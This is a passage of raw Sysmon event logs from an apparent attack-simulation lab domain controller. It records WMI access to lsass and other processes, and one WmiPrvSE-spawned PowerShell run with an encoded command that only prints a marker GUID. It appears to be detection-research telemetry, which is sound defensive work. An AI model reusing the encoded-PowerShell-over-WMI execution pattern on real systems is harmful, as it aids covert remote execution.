16:52:52.065{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1500-00000000AD01}1492C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236736Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.065{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1400-00000000AD01}1316C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236735Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.063{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1300-00000000AD01}1256C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236734Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.063{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1200-00000000AD01}1160C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236733Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.062{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1100-00000000AD01}1152C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236732Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.061{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-1000-00000000AD01}1144C:\Windows\system32\dwm.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236731Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.061{05ADC7E1-6D64-603E-75AA-00000000AD01}302412164C:\Windows\system32\conhost.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\SYSTEM32\ConhostV2.dll+5c07|C:\Windows\SYSTEM32\ConhostV2.dll+76ab|C:\Windows\SYSTEM32\ConhostV2.dll+a84c|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236730Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.060{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0F00-00000000AD01}1100C:\Windows\System32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236729Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.060{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0E00-00000000AD01}1076C:\Windows\system32\LogonUI.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236728Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0D00-00000000AD01}620C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236727Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229F-6039-0C00-00000000AD01}588C:\Windows\system32\svchost.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 10341000x80000000000000002236726Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0B00-00000000AD01}852C:\Windows\system32\lsass.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002236725Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-72AA-00000000AD01}6720ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_dd5i3245.cfy.psm1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236724Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-229D-6039-0900-00000000AD01}792C:\Windows\system32\winlogon.exe0x1410C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+221bd|C:\Windows\system32\wbem\cimwin32.dll+6fb3|C:\Windows\system32\wbem\cimwin32.dll+7471|C:\Windows\SYSTEM32\framedynos.dll+5899|C:\Windows\SYSTEM32\framedynos.dll+adc4|C:\Windows\system32\wbem\wmiprvse.exe+a731|C:\Windows\system32\wbem\wmiprvse.exe+a344|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+5265e|C:\Windows\System32\RPCRT4.dll+244c7|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc 23542300x80000000000000002236723Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-72AA-00000000AD01}6720ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Temp\__PSScriptPolicyTest_1ct3bhve.xdk.ps1MD5=D17FE0A3F47BE24A6453E9EF58C94641,SHA256=96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236722Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-75AA-00000000AD01}3024C:\Windows\system32\conhost.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 23542300x80000000000000002236721Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.043{05ADC7E1-6D63-603E-6EAA-00000000AD01}5340ATTACKRANGE\AdministratorC:\Windows\System32\WindowsPowerShell\v1.0\powershell.exeC:\Users\Administrator\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractiveMD5=446DD1CF97EABA21CF14D03AEBC79F27,SHA256=A7DE5177C68A64BD48B36D49E2853799F4EBCFA8E4761F7CC472F333DC5F65CF,IMPHASH=00000000000000000000000000000000falsetrue 10341000x80000000000000002236720Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-29F0-6039-C005-00000000AD01}49441064C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6c14|C:\Windows\SYSTEM32\CSRSRV.dll+1a30|C:\Windows\SYSTEM32\CSRSRV.dll+5c09|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236719Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+fd18|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236718Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11aad|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236717Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+11058|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236716Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-229F-6039-0C00-00000000AD01}5888240C:\Windows\system32\svchost.exe{05ADC7E1-22AF-6039-2800-00000000AD01}1936C:\Windows\sysmon64.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\System32\KERNELBASE.dll+5eab4|c:\windows\system32\lsm.dll+12023|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+d96bd|C:\Windows\System32\RPCRT4.dll+6194c|C:\Windows\System32\RPCRT4.dll+52bf4|C:\Windows\System32\RPCRT4.dll+51b0d|C:\Windows\System32\RPCRT4.dll+523bb|C:\Windows\System32\RPCRT4.dll+2469c|C:\Windows\System32\RPCRT4.dll+24b1c|C:\Windows\System32\RPCRT4.dll+111bc|C:\Windows\System32\RPCRT4.dll+12a1b|C:\Windows\System32\RPCRT4.dll+1e12a|C:\Windows\SYSTEM32\ntdll.dll+1d34e|C:\Windows\SYSTEM32\ntdll.dll+1ecb9|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236715Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-229D-6039-0500-00000000AD01}636752C:\Windows\system32\csrss.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a6084|C:\Windows\system32\basesrv.DLL+2f47|C:\Windows\SYSTEM32\CSRSRV.dll+5645|C:\Windows\SYSTEM32\ntdll.dll+5182f 10341000x80000000000000002236714Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-6D63-603E-6BAA-00000000AD01}63445596C:\Windows\system32\wbem\wmiprvse.exe{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1fffffC:\Windows\SYSTEM32\ntdll.dll+a7354|C:\Windows\System32\KERNELBASE.dll+2b860|C:\Windows\System32\KERNELBASE.dll+6f453|C:\Windows\System32\KERNEL32.DLL+1d37f|C:\Windows\system32\wbem\cimwin32.dll+3adce|C:\Windows\system32\wbem\cimwin32.dll+3d475|C:\Windows\system32\wbem\cimwin32.dll+3ab15|C:\Windows\system32\wbem\cimwin32.dll+3b393|C:\Windows\system32\wbem\cimwin32.dll+3bb40|C:\Windows\SYSTEM32\framedynos.dll+20256|C:\Windows\SYSTEM32\framedynos.dll+218b5|C:\Windows\system32\wbem\wmiprvse.exe+1704a|C:\Windows\system32\wbem\wmiprvse.exe+1724f|C:\Windows\System32\RPCRT4.dll+78e23|C:\Windows\System32\RPCRT4.dll+2d5ab|C:\Windows\System32\combase.dll+2840|C:\Windows\System32\RPCRT4.dll+6199b|C:\Windows\System32\combase.dll+6a22c|C:\Windows\System32\combase.dll+69ee2|C:\Windows\System32\combase.dll+687f8|C:\Windows\System32\combase.dll+6657d|C:\Windows\System32\combase.dll+65c5f|C:\Windows\System32\combase.dll+81439|C:\Windows\System32\RPCRT4.dll+52bf4 154100x80000000000000002236713Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.039{05ADC7E1-6D64-603E-74AA-00000000AD01}7684C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe10.0.14393.206 (rs1_release.160915-0644)Windows PowerShellMicrosoft® Windows® Operating SystemMicrosoft CorporationPowerShell.EXEpowershell.exe -NoProfile -Enco VwByAGkAdABlAC0ASABvAHMAdAAgADAAMABhAGQAZQA3ADMANQAtAGIAMwAwADIALQA0ADAAOAA2AC0AOQBkAGUAZQAtAGMAMwAyAGEAZQA3ADYAMwAxADYANAA0AA==C:\Windows\system32\ATTACKRANGE\Administrator{05ADC7E1-29F1-6039-B11D-350000000000}0x351db12HighMD5=097CE5761C89434367598B34FE32893B,SHA256=BA4038FD20E474C047BE8AAD5BFACDB1BFC1DDBE12F803F473B7918D8D819436,IMPHASH=CAEE994F79D85E47C06E5FA9CDEAE453{05ADC7E1-6D63-603E-6BAA-00000000AD01}6344C:\Windows\System32\wbem\WmiPrvSE.exeC:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding 10341000x80000000000000002236712Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 16:52:52.028{05ADC7E1-229F-6039-1600-00000000AD01}154010492C:\Windows\system32\svchost.exe{05ADC7E1-6D63-603E-70AA-00000000AD01}3652C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe0x1400C:\Windows\SYSTEM32\ntdll.dll+a6084|c:\windows\system32\themeservice.dll+235b|c:\windows\system32\themeservice.dll+1ed0|c:\windows\system32\themeservice.dll+2006|C:\Windows\SYSTEM32\ntdll.dll+39d99|C:\Windows\SYSTEM32\ntdll.dll+1e88a|C:\Windows\System32\KERNEL32.DLL+84d4|C:\Windows\SYSTEM32\ntdll.dll+51821 10341000x80000000000000002236711Microsoft-Windows-Sysmon/Operationalwin-dc-974.attackrange.local-2021-03-02 